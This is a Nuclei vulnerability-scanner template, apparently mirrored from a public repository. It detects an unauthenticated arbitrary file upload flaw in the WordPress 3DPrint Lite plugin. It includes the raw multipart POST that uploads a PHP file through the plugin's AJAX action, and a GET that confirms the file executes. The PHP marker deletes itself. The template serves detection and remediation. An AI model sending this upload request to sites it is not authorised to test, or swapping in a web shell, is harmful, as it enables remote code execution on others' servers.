daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/vulnerabilities/wordpress/3dprint-arbitrary-file-uplo...

52 lines
2.2 KiB
YAML
Raw Permalink Blame History

id: 3dprint-arbitrary-file-upload
info:
name: WordPress 3DPrint Lite <1.9.1.5 - Arbitrary File Upload
author: SecTheBit
severity: high
description: |
WordPress 3DPrint Lite plugin before 1.9.1.5 contains an arbitrary file upload vulnerability. The p3dlite_handle_upload AJAX action of the plugin does not have any authorization and does not check the uploaded file. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code, As a result, an attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
remediation: Upgrade to 1.9.1.5 or later.
reference:
- https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282
- https://www.exploit-db.com/exploits/50321
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cwe-id: CWE-434
metadata:
verified: true
max-request: 2
tags: wpscan,edb,wordpress,wp,wp-plugin,fileupload,intrusive,3dprint
variables:
string: "3dprint-arbitrary-file-upload"
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353
-----------------------------54331109111293931601238262353
Content-Disposition: form-data; name="action"
p3dlite_handle_upload
-----------------------------54331109111293931601238262353
Content-Disposition: form-data; name="file"; filename={{randstr}}.php
Content-Type: text/php
<?php echo md5("{{string}}");unlink(__FILE__);?>
-----------------------------54331109111293931601238262353--
- |
GET /wp-content/uploads/p3d/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body_2
words:
- '{{md5(string)}}'
# digest: 4a0a004730450221008a28b4b47b5015952648a69d2a015d7ee703b58e0d53c69d3dd9a63c005ef55302206e2e52065a4b1f5c9198d9f027aa6f7bade93c2da3928956f1a05bffb97627ad:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink